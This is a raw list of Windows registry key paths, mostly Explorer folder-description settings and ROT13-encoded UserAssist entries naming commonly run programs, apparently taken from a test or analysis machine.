HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuPinnedList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\FavoritesRemovedChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\FavoritesChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\ProgramsCacheSMP
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband\FavoritesChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\ProgramsCacheTBP
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMFUprogramsList
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs
HKEY_CLASSES_ROOT\CLSID\{DD313E04-FEFF-11D1-8ECD-0000F87A470C}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DD313E04-FEFF-11D1-8ECD-0000F87A470C}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInstrumentation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Vagrearg Rkcybere (64-ovg).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Vagrearg Rkcybere.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\HRZR_PGYPHNPbhag:pgbe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Pbzznaq Cebzcg.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_MinMFU
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.TrggvatFgnegrq
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\qvfcynlfjvgpu.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pnyp.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.FgvpxlAbgrf
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\FavccvatGbby.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfcnvag.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\kcfepuij.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JSF.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.ErzbgrQrfxgbc
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zntavsl.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.PbagebyCnary
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\freivprf.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.PbagebyCnary.Gnfxone
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\rkcybere.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Q:\IOBKJVAQBJFNQQVGVBAF-NZQ64.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Benpyr\IveghnyObk Thrfg Nqqvgvbaf\IObkQeiVafg.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\ertrqvg.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\\IOBKFIE\Qbjaybnqf\9.0_NqorEqe90_ra_HF.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfvrkrp.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.JvaqbjfVafgnyyre
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\Qrfxgbc\CVY-1.1.7.jva32-cl2.7.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\Qrfxgbc\wqx-7-jvaqbjf-v586.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.VagreargRkcybere.Qrsnhyg
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Q:\frghc.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Q:\IObkJvaqbjfNqqvgvbaf.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\HfreNppbhagPbagebyFrggvatf.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\erxrljvm.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zzp.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\fyhv.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\frgup.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\FlfgrzCebcregvrfNqinaprq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\Qrfxgbc\AQC451-XO2858728-k86-k64-NyyBF-RAH.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Zvpebfbsg Bssvpr\Bssvpr14\JVAJBEQ.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Zvpebfbsg Bssvpr\Bssvpr14\RKPRY.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Zvpebfbsg Bssvpr\Bssvpr14\BHGYBBX.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Zvpebfbsg Bssvpr\Bssvpr14\CBJRECAG.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Zvpebfbsg Bssvpr\Bssvpr14\BARABGR.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Nqbor\Ernqre 9.0\Ernqre\NpebEq32.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Benpyr\IveghnyObk Thrfg Nqqvgvbaf\havafg.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\NccQngn\Ybpny\Grzc\~afh.gzc\Nh_.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\jvaire.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Clguba27\clgubaj.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{7SR8Q22N-SO1Q-N8OR-01R3-6P8693961R6R}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.VagreargRkcybere.64Ovg
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pzq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\Qbjaybnqf\Nhgbehaf64.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{P1P6S8NP-40N3-0S5P-146S-65N9QP70OOO4}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jrypbzr Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\qvfcynlfjvgpu.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Pnyphyngbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Fgvpxl Abgrf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Favccvat Gbby.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Cnvag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\KCF Ivrjre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf Snk naq Fpna.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Erzbgr Qrfxgbc Pbaarpgvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Npprffvovyvgl\Zntavsl.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\freivprf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Jbeq 2010.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Rkpry 2010.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg Bhgybbx 2010.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg CbjreCbvag 2010.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr\Zvpebfbsg BarAbgr 2010.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqbor Ernqre 9.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Benpyr IZ IveghnyObk Thrfg Nqqvgvbaf\Havafgnyy.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Gnfx Fpurqhyre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Abgrcnq.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Jvaqbjf Rkcybere.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Npprffvovyvgl\Aneengbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Npprffvovyvgl\Ba-Fperra Xrlobneq.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Flfgrz Gbbyf\Cevingr Punenpgre Rqvgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npebong.pbz.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zrqvn Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Fvqrone.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf Nalgvzr Hctenqr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf QIQ Znxre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Jvaqbjf Zrqvn Cynlre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Zngu Vachg Cnary.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Zbovyvgl Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\ArgjbexCebwrpgvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Fbhaq Erpbeqre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flap Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jbeqcnq.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Npprffvovyvgl\Fcrrpu Erpbtavgvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Punenpgre Znc.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\qsethv.yax
